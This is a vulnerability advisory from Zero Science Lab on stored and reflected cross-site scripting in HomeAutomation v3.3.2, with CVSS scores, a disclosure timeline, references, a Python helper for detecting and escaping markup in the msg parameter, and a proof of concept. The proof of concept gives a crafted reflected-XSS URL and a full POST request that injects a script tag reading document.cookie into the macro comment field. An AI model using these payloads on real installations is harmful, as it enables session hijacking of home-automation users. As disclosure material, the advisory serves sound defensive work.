zeroscience | Gjoko Krstic | ZSL-2019-5556
History: Dec 29, 2019 - 12:00 a.m.

HomeAutomation v3.3.2 Stored and Reflected XSS

2019-12-29 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score: 6.3 Medium
Confidence: High

CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS: 0.001 Low
Percentile: 45.9%

Title: HomeAutomation v3.3.2 Stored and Reflected XSS
Advisory ID: ZSL-2019-5556
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 29.12.2019

Summary

HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house.

Description

HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
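
The reflected request in the PoC further down carries its message as base64-encoded JSON in the msg parameter, so markup in the text field is not visible to a filter that only inspects the raw URL. The following is an added example, not code from HomeAutomation or from the advisory: it decodes msg, reports which fields contain markup, and shows the HTML-encoded form the page should emit. The function names and the ha.example host are assumptions.

```python
import base64, binascii, html, json, re
from urllib.parse import parse_qs, urlsplit

# Reflected request from this advisory's PoC; msg is base64-encoded JSON.
ADVISORY_URL = (
    "https://192.168.2.113/?page=houseplan&autologin=1&msg="
    "eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9y"
    "IHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3Ii"
    "LCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ=="
)

# A tag or character reference where the UI expects plain message text.
MARKUP = re.compile(r"<[^>]*>|&#?\w+;")

def decode_msg(url):
    """Return the JSON object carried in the msg parameter, or None."""
    values = parse_qs(urlsplit(url).query).get("msg")
    if not values:
        return None
    raw = values[0].replace(" ", "+")  # parse_qs turns '+' into a space
    try:
        obj = json.loads(base64.b64decode(raw, validate=True))
    except (binascii.Error, ValueError):
        return None
    return obj if isinstance(obj, dict) else None

def markup_fields(msg):
    """Names of string fields whose value contains markup."""
    return [k for k, v in msg.items() if isinstance(v, str) and MARKUP.search(v)]

def render_text(msg):
    """Server-side fix: HTML-encode the text before it is written to the page."""
    return html.escape(str(msg.get("text", "")), quote=True)

def encode_msg(obj):
    """Build a msg value for the constructed benign sample below."""
    return base64.b64encode(json.dumps(obj).encode()).decode()

# Constructed sample: the same kind of message without any markup.
BENIGN_URL = "https://ha.example/?page=houseplan&msg=" + encode_msg(
    {"id": "", "text": "Username or password wrong", "type": "error"})

if __name__ == "__main__":
    for url in (ADVISORY_URL, BENIGN_URL):
        msg = decode_msg(url)
        print(markup_fields(msg), render_text(msg))
```

The same output encoding applies to stored values such as the macro comment field when they are written back into a page.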

Vendor

Tom Rosenback and Daniel Malmgren - <http://karpero.mine.nu/ha/>

Affected Version

3.3.2

Tested On

Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1

Vendor Status

[06.11.2019] Vulnerability discovered.
[07.11.2019] Vendor contacted.
[29.11.2019] No response from the vendor.
[30.11.2019] Vendor contacted.
[28.12.2019] No response from the vendor.
[29.12.2019] Public security advisory released.

PoC

homeautomation_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/47806>
[2] <https://cxsecurity.com/issue/WLB-2019120130>
[3] <https://packetstormsecurity.com/files/155786/>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173655>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173656>
[6] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-21987>
[7] <https://nvd.nist.gov/vuln/detail/CVE-2020-21987>
[8] <https://www.tenable.com/cve/CVE-2020-21987>

Changelog

[29.12.2019] - Initial release
[24.01.2020] - Added reference [1], [2], [3], [4] and [5]
[19.06.2021] - Added reference [6], [7] and [8]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

HomeAutomation v3.3.2 Stored and Reflected XSS


Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.

Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5556
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php


06.11.2019

--


Reflected XSS:
--------------

https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==


Stored XSS:
-----------

POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 998
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og


------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="id"

-1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="action"

save
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="name"

XSS
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="comment"

"><script>confirm(document.cookie)</script>
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="icon_on"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="scenario"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="devices[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="statuses[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="save"

Save
------WebKitFormBoundaryq4LcgA7mbqElCW4q--
